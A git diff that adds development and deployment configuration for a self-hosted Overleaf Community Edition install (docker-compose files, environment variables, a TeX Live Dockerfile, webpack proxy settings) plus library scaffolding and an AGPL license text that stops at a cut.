--- /dev/null +++ b/develop/dev.env @@ -0,0 +1,20 @@ +CHAT_HOST=chat +CLSI_HOST=clsi +CONTACTS_HOST=contacts +DOCSTORE_HOST=docstore +DOCUMENT_UPDATER_HOST=document-updater +FILESTORE_HOST=filestore +GRACEFUL_SHUTDOWN_DELAY_SECONDS=0 +HISTORY_V1_HOST=history-v1 +LISTEN_ADDRESS=0.0.0.0 +MONGO_HOST=mongo +MONGO_URL=mongodb://mongo/sharelatex?directConnection=true +NOTIFICATIONS_HOST=notifications +PROJECT_HISTORY_HOST=project-history +REALTIME_HOST=real-time +REDIS_HOST=redis +SESSION_SECRET=foo +WEBPACK_HOST=webpack +WEB_API_PASSWORD=overleaf +WEB_API_USER=overleaf +WEB_HOST=web diff --git a/develop/docker-compose.dev.yml b/develop/docker-compose.dev.yml new file mode 100644 index 0000000..4432a24 --- /dev/null +++ b/develop/docker-compose.dev.yml @@ -0,0 +1,139 @@ +services: + clsi: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9230:9229" + volumes: + - ../services/clsi/app:/overleaf/services/clsi/app + - ../services/clsi/app.js:/overleaf/services/clsi/app.js + - ../services/clsi/config:/overleaf/services/clsi/config + + chat: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9231:9229" + volumes: + - ../services/chat/app:/overleaf/services/chat/app + - ../services/chat/app.js:/overleaf/services/chat/app.js + - ../services/chat/config:/overleaf/services/chat/config + + contacts: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9232:9229" + volumes: + - ../services/contacts/app:/overleaf/services/contacts/app + - ../services/contacts/app.js:/overleaf/services/contacts/app.js + - ../services/contacts/config:/overleaf/services/contacts/config + + docstore: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9233:9229" + volumes: + - ../services/docstore/app:/overleaf/services/docstore/app + - ../services/docstore/app.js:/overleaf/services/docstore/app.js + - ../services/docstore/config:/overleaf/services/docstore/config + + document-updater: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9234:9229" + volumes: + - ../services/document-updater/app:/overleaf/services/document-updater/app + - ../services/document-updater/app.js:/overleaf/services/document-updater/app.js + - ../services/document-updater/config:/overleaf/services/document-updater/config + + filestore: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9235:9229" + volumes: + - ../services/filestore/app:/overleaf/services/filestore/app + - ../services/filestore/app.js:/overleaf/services/filestore/app.js + - ../services/filestore/config:/overleaf/services/filestore/config + + history-v1: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9239:9229" + volumes: + - ../services/history-v1/api:/overleaf/services/history-v1/api + - ../services/history-v1/app.js:/overleaf/services/history-v1/app.js + - ../services/history-v1/config:/overleaf/services/history-v1/config + - ../services/history-v1/storage:/overleaf/services/history-v1/storage + - ../services/history-v1/knexfile.js:/overleaf/services/history-v1/knexfile.js + - ../services/history-v1/migrations:/overleaf/services/history-v1/migrations + + notifications: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9236:9229" + volumes: + - ../services/notifications/app:/overleaf/services/notifications/app + - ../services/notifications/app.js:/overleaf/services/notifications/app.js + - ../services/notifications/config:/overleaf/services/notifications/config + + project-history: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9240:9229" + volumes: + - ../services/project-history/app:/overleaf/services/project-history/app + - ../services/project-history/app.js:/overleaf/services/project-history/app.js + - ../services/project-history/config:/overleaf/services/project-history/config + + real-time: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9237:9229" + volumes: + - ../services/real-time/app:/overleaf/services/real-time/app + - ../services/real-time/app.js:/overleaf/services/real-time/app.js + - ../services/real-time/config:/overleaf/services/real-time/config + + web: + command: ["node", "--watch", "app.js", "--watch-locales"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9229:9229" + volumes: + - ../services/web/app:/overleaf/services/web/app + - ../services/web/app.mjs:/overleaf/services/web/app.mjs + - ../services/web/config:/overleaf/services/web/config + - ../services/web/locales:/overleaf/services/web/locales + - ../services/web/modules:/overleaf/services/web/modules + - ../services/web/public:/overleaf/services/web/public + + webpack: + volumes: + - ../services/web/app:/overleaf/services/web/app + - ../services/web/config:/overleaf/services/web/config + - ../services/web/frontend:/overleaf/services/web/frontend + - ../services/web/locales:/overleaf/services/web/locales + - ../services/web/modules:/overleaf/services/web/modules + - ../services/web/public:/overleaf/services/web/public + - ../services/web/transform:/overleaf/services/web/transform + - ../services/web/types:/overleaf/services/web/types + - ../services/web/webpack-plugins:/overleaf/services/web/webpack-plugins diff --git a/develop/docker-compose.yml b/develop/docker-compose.yml new file mode 100644 index 0000000..e37999f --- /dev/null +++ b/develop/docker-compose.yml @@ -0,0 +1,175 @@ +volumes: + clsi-cache: + clsi-output: + filestore-public-files: + filestore-template-files: + filestore-uploads: + filestore-user-files: + mongo-data: + redis-data: + sharelatex-data: + web-data: + history-v1-buckets: + +services: + chat: + build: + context: .. + dockerfile: services/chat/Dockerfile + env_file: + - dev.env + + clsi: + build: + context: .. + dockerfile: services/clsi/Dockerfile + env_file: + - dev.env + environment: + - DOCKER_RUNNER=true + - TEXLIVE_IMAGE=texlive-full # docker build texlive -t texlive-full + - COMPILES_HOST_DIR=${PWD}/compiles + - OUTPUT_HOST_DIR=${PWD}/output + user: root + volumes: + - ${PWD}/compiles:/overleaf/services/clsi/compiles + - ${DOCKER_SOCKET_PATH:-/var/run/docker.sock}:/var/run/docker.sock + - clsi-cache:/overleaf/services/clsi/cache + - clsi-output:/overleaf/services/clsi/output + + contacts: + build: + context: .. + dockerfile: services/contacts/Dockerfile + env_file: + - dev.env + + docstore: + build: + context: .. + dockerfile: services/docstore/Dockerfile + env_file: + - dev.env + + document-updater: + build: + context: .. + dockerfile: services/document-updater/Dockerfile + env_file: + - dev.env + + filestore: + build: + context: .. + dockerfile: services/filestore/Dockerfile + env_file: + - dev.env +# environment: +# - ENABLE_CONVERSIONS=true + volumes: + - filestore-public-files:/overleaf/services/filestore/public_files + - filestore-template-files:/overleaf/services/filestore/template_files + - filestore-uploads:/overleaf/services/filestore/uploads + - filestore-user-files:/overleaf/services/filestore/user_files + + history-v1: + build: + context: .. + dockerfile: services/history-v1/Dockerfile + env_file: + - dev.env + environment: + OVERLEAF_EDITOR_ANALYTICS_BUCKET: "/buckets/analytics" + OVERLEAF_EDITOR_BLOBS_BUCKET: "/buckets/blobs" + OVERLEAF_EDITOR_CHUNKS_BUCKET: "/buckets/chunks" + OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET: "/buckets/project_blobs" + OVERLEAF_EDITOR_ZIPS_BUCKET: "/buckets/zips" + PERSISTOR_BACKEND: fs + volumes: + - history-v1-buckets:/buckets + + mongo: + image: mongo:6.0 + command: --replSet overleaf + ports: + - "127.0.0.1:27017:27017" # for debugging + volumes: + - mongo-data:/data/db + - ../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + + notifications: + build: + context: .. + dockerfile: services/notifications/Dockerfile + env_file: + - dev.env + + project-history: + build: + context: .. + dockerfile: services/project-history/Dockerfile + env_file: + - dev.env + + real-time: + build: + context: .. + dockerfile: services/real-time/Dockerfile + env_file: + - dev.env + + redis: + image: redis:5 + ports: + - "127.0.0.1:6379:6379" # for debugging + volumes: + - redis-data:/data + + web: + build: + context: .. + dockerfile: services/web/Dockerfile + target: dev + env_file: + - dev.env + environment: + - APP_NAME=Overleaf Community Edition + - ENABLED_LINKED_FILE_TYPES=project_file,project_output_file + - EMAIL_CONFIRMATION_DISABLED=true + - NODE_ENV=development + - OVERLEAF_ALLOW_PUBLIC_ACCESS=true + command: ["node", "app.mjs"] + volumes: + - sharelatex-data:/var/lib/overleaf + - web-data:/overleaf/services/web/data + depends_on: + - mongo + - redis + - chat + - clsi + - contacts + - docstore + - document-updater + - filestore + - history-v1 + - notifications + - project-history + - real-time + + webpack: + build: + context: .. + dockerfile: services/web/Dockerfile + target: webpack + command: ["npx", "webpack", "serve", "--config", "webpack.config.dev-env.js"] + ports: + - "127.0.0.1:80:3808" + volumes: + - ./webpack.config.dev-env.js:/overleaf/services/web/webpack.config.dev-env.js diff --git a/develop/texlive/Dockerfile b/develop/texlive/Dockerfile new file mode 100644 index 0000000..944681a --- /dev/null +++ b/develop/texlive/Dockerfile @@ -0,0 +1,8 @@ +FROM debian:testing-slim + +RUN apt-get update +RUN apt-cache depends texlive-full | grep "Depends: " | grep -v -- "-doc" | grep -v -- "-lang-" | sed 's/Depends: //' | xargs apt-get install -y --no-install-recommends +RUN apt-get install -y --no-install-recommends fontconfig inkscape pandoc python3-pygments + +RUN useradd tex +USER tex diff --git a/develop/webpack.config.dev-env.js b/develop/webpack.config.dev-env.js new file mode 100644 index 0000000..49f8540 --- /dev/null +++ b/develop/webpack.config.dev-env.js @@ -0,0 +1,23 @@ +const { merge } = require('webpack-merge') + +const base = require('./webpack.config.dev') + +module.exports = merge(base, { + devServer: { + allowedHosts: 'auto', + devMiddleware: { + index: false, + }, + proxy: [ + { + context: '/socket.io/**', + target: 'http://real-time:3026', + ws: true, + }, + { + context: ['!**/*.js', '!**/*.css', '!**/*.json'], + target: 'http://web:3000', + }, + ], + }, +}) diff --git a/doc/logo.png b/doc/logo.png new file mode 100644 index 0000000..106926b Binary files /dev/null and b/doc/logo.png differ diff --git a/doc/screenshot.png b/doc/screenshot.png new file mode 100644 index 0000000..1c1f339 Binary files /dev/null and b/doc/screenshot.png differ diff --git a/docker-compose.debug.yml b/docker-compose.debug.yml new file mode 100644 index 0000000..cf87fbf --- /dev/null +++ b/docker-compose.debug.yml @@ -0,0 +1,23 @@ +version: '2.2' +services: + sharelatex: + ports: + - 30000:30000 + - 30150:30150 + - 30120:30120 + - 30050:30050 + - 30420:30420 + - 30030:30030 + - 30160:30160 + - 30360:30360 + - 30130:30130 + - 30100:30100 + - 30540:30540 + - 30640:30640 + - 40000:40000 + + # Server Pro + - 30070:30070 + - 30400:30400 + environment: + DEBUG_NODE: 'true' diff --git a/docker-compose.yml b/docker-compose.yml new file mode 100644 index 0000000..8ca5112 --- /dev/null +++ b/docker-compose.yml @@ -0,0 +1,146 @@ +services: + sharelatex: + restart: always + # Server Pro users: + # image: quay.io/sharelatex/sharelatex-pro + image: sharelatex/sharelatex:arm64 + container_name: sharelatex + depends_on: + mongo: + condition: service_healthy + redis: + condition: service_started + ports: + - 80:80 + stop_grace_period: 60s + volumes: + - ~/overleaf/sharelatex_data:/var/lib/overleaf + # - /opt/homebrew/Cellar/texlive:/usr/local/texlive + ######################################################################## + #### Server Pro: Uncomment the following line to mount the docker #### + #### socket, required for Sibling Containers to work #### + ######################################################################## + # - /var/run/docker.sock:/var/run/docker.sock + environment: + + OVERLEAF_APP_NAME: Overleaf Community Edition + + OVERLEAF_MONGO_URL: mongodb://mongo/sharelatex + + # Same property, unfortunately with different names in + # different locations + OVERLEAF_REDIS_HOST: redis + REDIS_HOST: redis + + ENABLED_LINKED_FILE_TYPES: 'project_file,project_output_file' + + # Enables Thumbnail generation using ImageMagick + ENABLE_CONVERSIONS: 'true' + + # Disables email confirmation requirement + EMAIL_CONFIRMATION_DISABLED: 'true' + + ## Set for SSL via nginx-proxy + #VIRTUAL_HOST: 103.112.212.22 + + # OVERLEAF_SITE_URL: http://overleaf.example.com + # OVERLEAF_NAV_TITLE: Overleaf Community Edition + # OVERLEAF_HEADER_IMAGE_URL: http://example.com/mylogo.png + # OVERLEAF_ADMIN_EMAIL: support@it.com + + # OVERLEAF_LEFT_FOOTER: '[{"text": "Another page I want to link to can be found here"} ]' + # OVERLEAF_RIGHT_FOOTER: '[{"text": "Hello I am on the Right"} ]' + + # OVERLEAF_EMAIL_FROM_ADDRESS: "hello@example.com" + + # OVERLEAF_EMAIL_AWS_SES_ACCESS_KEY_ID: + # OVERLEAF_EMAIL_AWS_SES_SECRET_KEY: + + # OVERLEAF_EMAIL_SMTP_HOST: smtp.example.com + # OVERLEAF_EMAIL_SMTP_PORT: 587 + # OVERLEAF_EMAIL_SMTP_SECURE: false + # OVERLEAF_EMAIL_SMTP_USER: + # OVERLEAF_EMAIL_SMTP_PASS: + # OVERLEAF_EMAIL_SMTP_TLS_REJECT_UNAUTH: true + # OVERLEAF_EMAIL_SMTP_IGNORE_TLS: false + # OVERLEAF_EMAIL_SMTP_NAME: '127.0.0.1' + # OVERLEAF_EMAIL_SMTP_LOGGER: true + # OVERLEAF_CUSTOM_EMAIL_FOOTER: "This system is run by department x" + + # ENABLE_CRON_RESOURCE_DELETION: true + + ################ + ## Server Pro ## + ################ + + ## Sandboxed Compiles: https://github.com/overleaf/overleaf/wiki/Server-Pro:-Sandboxed-Compiles + # SANDBOXED_COMPILES: 'true' + # SANDBOXED_COMPILES_SIBLING_CONTAINERS: 'true' + ### Bind-mount source for /var/lib/overleaf/data/compiles inside the container. + # SANDBOXED_COMPILES_HOST_DIR_COMPILES: '/home/user/sharelatex_data/data/compiles' + ### Bind-mount source for /var/lib/overleaf/data/output inside the container. + # SANDBOXED_COMPILES_HOST_DIR_OUTPUT: '/home/user/sharelatex_data/data/output' + + ## Works with test LDAP server shown at bottom of docker compose + # OVERLEAF_LDAP_URL: 'ldap://ldap:389' + # OVERLEAF_LDAP_SEARCH_BASE: 'ou=people,dc=planetexpress,dc=com' + # OVERLEAF_LDAP_SEARCH_FILTER: '(uid={{username}})' + # OVERLEAF_LDAP_BIND_DN: 'cn=admin,dc=planetexpress,dc=com' + # OVERLEAF_LDAP_BIND_CREDENTIALS: 'GoodNewsEveryone' + # OVERLEAF_LDAP_EMAIL_ATT: 'mail' + # OVERLEAF_LDAP_NAME_ATT: 'cn' + # OVERLEAF_LDAP_LAST_NAME_ATT: 'sn' + # OVERLEAF_LDAP_UPDATE_USER_DETAILS_ON_LOGIN: 'true' + + # OVERLEAF_TEMPLATES_USER_ID: "578773160210479700917ee5" + # OVERLEAF_NEW_PROJECT_TEMPLATE_LINKS: '[ {"name":"All Templates","url":"/templates/all"}]' + + + # OVERLEAF_PROXY_LEARN: "true" + + mongo: + restart: always + image: mongo:6.0 + container_name: mongo + command: '--replSet overleaf' + volumes: + - ~/overleaf/mongo_data:/data/db + - ./bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the replica set. + # This override is not needed when running the setup after starting up mongo. + - mongo:127.0.0.1 + healthcheck: + test: echo 'db.stats().ok' | mongosh localhost:27017/test --quiet + interval: 10s + timeout: 10s + retries: 5 + + redis: + restart: always + image: redis:6.2 + container_name: redis + volumes: + - ~/overleaf/redis_data:/data + + # ldap: + # restart: always + # image: rroemhild/test-openldap + # container_name: ldap + + # See https://github.com/jwilder/nginx-proxy for documentation on how to configure the nginx-proxy container, + # and https://github.com/overleaf/overleaf/wiki/HTTPS-reverse-proxy-using-Nginx for an example of some recommended + # settings. We recommend using a properly managed nginx instance outside of the Overleaf Server Pro setup, + # but the example here can be used if you'd prefer to run everything with docker-compose + + # nginx-proxy: + # image: jwilder/nginx-proxy + # container_name: nginx-proxy + # ports: + # - "80:80" + # - "443:443" + # volumes: + # - /var/run/docker.sock:/tmp/docker.sock:ro + # - /home/overleaf/tmp:/etc/nginx/certs diff --git a/libraries/access-token-encryptor/.gitignore b/libraries/access-token-encryptor/.gitignore new file mode 100644 index 0000000..66936c4 --- /dev/null +++ b/libraries/access-token-encryptor/.gitignore @@ -0,0 +1,46 @@ +compileFolder + +Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### +*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? +Thumbs.db + +/node_modules/* +data/*/* + +**.swp + +/log.json +hash_folder + +.npmrc diff --git a/libraries/access-token-encryptor/.mocharc.json b/libraries/access-token-encryptor/.mocharc.json new file mode 100644 index 0000000..c492858 --- /dev/null +++ b/libraries/access-token-encryptor/.mocharc.json @@ -0,0 +1,6 @@ +{ + "ui": "bdd", + "recursive": "true", + "reporter": "spec", + "require": "test/setup.js" +} diff --git a/libraries/access-token-encryptor/.nvmrc b/libraries/access-token-encryptor/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/access-token-encryptor/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/access-token-encryptor/LICENSE b/libraries/access-token-encryptor/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/libraries/access-token-encryptor/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 